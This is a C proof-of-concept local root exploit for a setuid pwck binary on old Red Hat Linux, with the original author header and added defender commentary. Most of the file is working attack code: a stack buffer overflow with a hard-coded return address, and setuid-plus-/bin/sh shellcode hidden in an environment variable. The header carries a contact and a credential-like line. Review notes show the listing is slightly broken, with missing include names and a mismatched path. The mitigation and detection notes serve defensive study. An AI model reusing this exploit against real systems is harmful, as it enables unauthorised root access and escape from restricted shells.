/* /usr/sbin/pwck local root exploit for linux */
/* Only has an effect when pwck is +s (setuid) */
/* Remember though it's a good way to break free */
/* from restricted shells - even to the same UID */
/* http://oakey.no-ip.com:82/uk2sec/ */
/* kiddie:password */
/* c0w_d0g3@yahoo.co.uk */
/* Tested on Redhat 7.1/2/3 */

/*
 * Analyst notes for defenders reading this proof of concept:
 *
 *  - Bug class: the program hands pwck a first argument of about 2400
 *    bytes followed by a chosen address. That pattern implies pwck copied
 *    the argument into a fixed-size stack buffer without a length check
 *    (the pwck source is not shown on this page, so this is inferred).
 *
 *  - Precondition: per the author's header, privilege is gained only when
 *    /usr/sbin/pwck carries the setuid bit. pwck is an administrative tool
 *    normally run by root, so audit for the bit (`ls -l /usr/sbin/pwck`,
 *    or a periodic `find / -perm -4000 -type f` review) and clear it with
 *    `chmod u-s` where it is set.
 *
 *  - Mitigations: the technique depends on one hard-coded stack address
 *    and on executing bytes stored in the environment. Address-space
 *    randomisation and a non-executable stack both break those
 *    assumptions; updating the vulnerable package remains the actual fix.
 *
 *  - Detection: an exec of pwck whose argument is kilobytes long, or a
 *    process environment holding a variable named SHELLCODE with
 *    non-printable content, is a strong signal in exec/audit logs.
 */

/* NOTE(review): the header names after each #include were lost when this
 * page was extracted; the listing does not compile as shown. */
#include
#include
#include

int main()
{
    /*
     * Position-independent Linux/i386 machine code. The byte pairs
     * b0 17 / cd 80 select syscall 23 (setuid) through int 0x80 with a
     * zeroed ebx, b0 0b selects syscall 11 (execve), and b0 01 selects
     * exit; the trailing literal is the program path. Net effect:
     * setuid(0) followed by spawning /bin/sh.
     */
    char linuxshellcode[] =
        "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
        "\xeb\x16\x31\xdb\x31\xc9\xf7\xe1"
        "\x5b\xb0\x0b\x88\x53\x07\x52\x53"
        "\x89\xe1\xcd\x80\xb0\x01\xcd\x80"
        "\xe8\xe5\xff\xff\xff/bin/sh";
    char buffer[3000];          /* becomes argv[1] of pwck */
    /* Fixed address just below the top of the 32-bit user stack;
     * presumably meant to land inside the environment string built
     * below. It is only meaningful when stack addresses do not vary. */
    long retaddr = 0xbfffffa1;
    int padding = 2400;         /* filler bytes written before the address */
    char shell[512];            /* holds the "SHELLCODE=..." environment entry */

    printf("\nuk2sec c0w_d0g3");
    /* NOTE(review): the banner says /usr/bin/pwck, but the execl() call
     * below targets /usr/sbin/pwck. */
    printf("\nThis is a local exploit for /usr/bin/pwck\n");
    printf("Satic return address is at : %x\n\n", retaddr);

    /* Building the buffer */
    bzero(&buffer, sizeof(buffer));     /* zero-fill so strlen() below stops at the filler's end */
    memset(buffer,'A',padding);         // `padding` bytes of filler
    /* strlen(buffer) equals `padding` here, so the address is stored
     * immediately after the filler. */
    *(unsigned long *)(buffer+strlen(buffer))=retaddr;      // return address

    /* Environment entry: 100 bytes of 0x90 (the x86 NOP opcode), with the
     * machine code copied so that it ends at index 99, then the first 10
     * bytes overwritten with the variable name. */
    memset(shell,0x90,100);
    memcpy(&shell[100-strlen(linuxshellcode)],linuxshellcode,strlen(linuxshellcode));
    memcpy(shell,"SHELLCODE=",10);
    putenv(shell);

    /* Run the target with the oversized argument as its only parameter. */
    execl("/usr/sbin/pwck", "pwck", buffer, 0);
    /* only yields elevated uid when pwck is +s */
}